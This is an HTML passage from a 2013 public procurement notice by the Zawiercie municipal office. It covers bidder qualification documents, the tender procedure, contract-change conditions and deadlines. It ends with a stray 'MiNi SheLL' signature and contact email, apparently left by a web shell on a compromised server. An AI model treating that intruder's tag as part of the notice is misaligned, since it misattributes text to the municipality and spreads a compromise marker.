<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 6 do SIWZ,
2)Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 7 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2.Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiana stawki podatku VAT,
2) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną,
3) przekształcenia podmiotowego Wykonawcy,
4)zmiany członków personelu kluczowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja/ odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego w ogłoszeniu o zamówieniu.
5)wstrzymania wykonania robót na żądanie Zamawiającego lub na podstawie poleceń lub decyzji uprawnionych osób lub organów administracji państwowej, samorządowej lub wystąpienia przyczyn niezależnych od Wykonawcy i Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych, pokój nr 202.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 10.06.2013r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com